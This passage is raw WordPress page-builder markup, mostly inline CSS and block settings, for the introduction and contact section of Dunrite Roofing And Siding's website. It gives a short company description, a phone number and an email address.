.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-46b2c521-30e6-4f12-bba8-c52b80616d9c\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Introduction</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Welcome to Dunrite Roofing And Siding</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"typography\":{\"fontSize\":17},\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\"} -->\n<p class=\"section-content has-text-color\" style=\"color:#494848;font-size:17px\">Based in Northern Oakland County Dunrite Roofing has been serving the surrounding areas for over 25 years. Quality workmanship and competitive pricing have led us to become a top choice when it comes to roofing and siding in southeastern Michigan. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"baab3fad-1feb-480f-b0a0-542d07c7eba5\",\"topPadding\":0,\"topPaddingTablet\":0,\"bottomPadding\":80,\"leftPadding\":0,\"leftPaddingTablet\":0,\"rightPadding\":0,\"rightPaddingTablet\":0,\"topMarginTablet\":-15,\"className\":\"gb-renovation-contact\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-contact skt-blocks-block-section-outer-wrap block-baab3fad-1feb-480f-b0a0-542d07c7eba5 background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5 .skt-blocks-block-section{\n margin-top: -15px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; }\n}\n @media only screen and (max-width: 767px){\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 80px; padding-left: 0px; padding-right: 0px; }\n}\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"blockId\":\"e4337017-bf4d-4e71-bbfe-842d1c251e6c\"} -->\n<style type=\"text/css\"> .block-e4337017-bf4d-4e71-bbfe-842d1c251e6c .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-e4337017-bf4d-4e71-bbfe-842d1c251e6c .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-e4337017-bf4d-4e71-bbfe-842d1c251e6c .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-e4337017-bf4d-4e71-bbfe-842d1c251e6c .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-e4337017-bf4d-4e71-bbfe-842d1c251e6c .skt-blocks-block-columns{\n padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-e4337017-bf4d-4e71-bbfe-842d1c251e6c .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-e4337017-bf4d-4e71-bbfe-842d1c251e6c .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-e4337017-bf4d-4e71-bbfe-842d1c251e6c skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":45,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":0,\"blockId\":\"7840f5f3-0744-458f-9ff2-16549137981d\"} -->\n<style type=\"text/css\"> .block-7840f5f3-0744-458f-9ff2-16549137981d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-7840f5f3-0744-458f-9ff2-16549137981d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-7840f5f3-0744-458f-9ff2-16549137981d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-7840f5f3-0744-458f-9ff2-16549137981d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7840f5f3-0744-458f-9ff2-16549137981d .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-7840f5f3-0744-458f-9ff2-16549137981d\" style=\"width:45%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"500\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":18,\"title\":\"call-icon\",\"filename\":\"call-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/call-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"call-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:33.000Z\",\"modified\":\"2021-05-25T13:48:33.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"5b5e5edc14\",\"delete\":\"ba6642c69e\",\"edit\":\"618a805067\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=18u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":593,\"filesizeHumanReadable\":\"593 B\",\"context\":\"\",\"height\":24,\"width\":23,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"height\":24,\"width\":23,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"65659e02-d7c8-4601-8298-92cc76359ea6\"} -->\n<style type=\"text/css\"> .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:500;font-family:Poppins;margin-bottom:5px\">Call Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">(248) 393-5000 </p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":55,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":15,\"blockId\":\"0521c096-f2f6-411e-ad36-b722f208852d\"} -->\n<style type=\"text/css\"> .block-0521c096-f2f6-411e-ad36-b722f208852d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-0521c096-f2f6-411e-ad36-b722f208852d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-0521c096-f2f6-411e-ad36-b722f208852d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-0521c096-f2f6-411e-ad36-b722f208852d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-0521c096-f2f6-411e-ad36-b722f208852d .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-0521c096-f2f6-411e-ad36-b722f208852d\" style=\"width:55%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"600\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":19,\"title\":\"email-icon\",\"filename\":\"email-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/email-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"email-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:34.000Z\",\"modified\":\"2021-05-25T13:48:34.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"322c42b944\",\"delete\":\"c562e168cc\",\"edit\":\"244b0c81a3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=19u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":451,\"filesizeHumanReadable\":\"451 B\",\"context\":\"\",\"height\":16,\"width\":23,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"height\":16,\"width\":23,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"b774f8a6-033a-4077-80ee-f0b2f30b0428\"} -->\n<style type=\"text/css\"> .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:600;font-family:Poppins;margin-bottom:5px\">Email Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">admin@dunriteroof.com</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Read More\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/about/\",\"target\":false,\"counterId\":\"9c9da01d-f799-4178-ae4b-9714df123864\",\"vPadding\":15,\"hPadding\":35,\"vMargin\":0,\"hMargin\":0,\"borderRadius\":50,\"borderStyle\":\"none\",\"borderColor\":\"#ffffff\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":16,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 0px !important; margin-bottom: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 15px; padding-bottom: 15px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: #ffffff; border-radius: 50px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 16px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 16px !important; }\n}\n@media only screen and (max-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n@media only screen and (max-width: 767px){\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/about/\">Read More</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"30f90495-ee55-4579-800d-d587d050d2fa\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-2\"} -->\n<div 